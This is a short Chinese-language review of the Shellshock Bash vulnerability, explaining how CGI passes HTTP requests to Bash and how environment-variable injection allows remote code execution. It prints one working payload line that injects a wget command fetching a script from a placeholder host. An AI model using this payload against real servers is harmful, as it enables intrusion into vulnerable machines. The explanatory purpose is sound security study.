review
- 定位漏洞緣由
部分大佬認爲uCGI技術的普及是個錯誤,正是因爲CGI技術的不合理之處,Shellshock纔有機可乘。
CGI技術是Web技術剛興起的時候發明的,它是最早的可以創建動態網頁內容的技術之一。它會把一個HTTP請求轉化爲一次shell調用。CGI (Common Gateway Interface),是一種基於瀏覽器的輸入,在Web服務器上運行程序的方法。
- 風險預估
起初以爲這個僅僅是個本地執行的漏洞。後面發現亦可作爲遠程×××。
遠程×××面:正是由於後臺處理程序不僅僅可以用PHP、Python、Perl等腳本來接受請求、解釋執行、響應客戶端,當然還可以用Bash腳本來解釋執行用戶提交的GET或POST請求。
Bash漏洞其實是非常經典的“注入式×××”,也就是可以向 bash注入一段命令,從bash1.14 到4.3都存在這樣的漏洞。
() { :;}; wget http://www.XXX.com/testvul.sh
對於利用Bash腳本處理用戶請求的網站,×××者可以精心僞造數據,通過網絡傳到一臺服務器上,直接或間接觸發一個bash腳本,這樣就可以遠程執行惡意代碼。
通過特定格式的指令設置環境變量,進而在執行bash腳本時會先執行把我們設置的環境變量執行。
shellshock分析與回顧:
http://www.myhack58.com/Article/html/3/8/2014/54877_13.htm
shellshock真實案列:
http://www.freebuf.com/articles/system/45390.html
×××前提:必須得在有漏洞的機器上執行我們的bash代碼。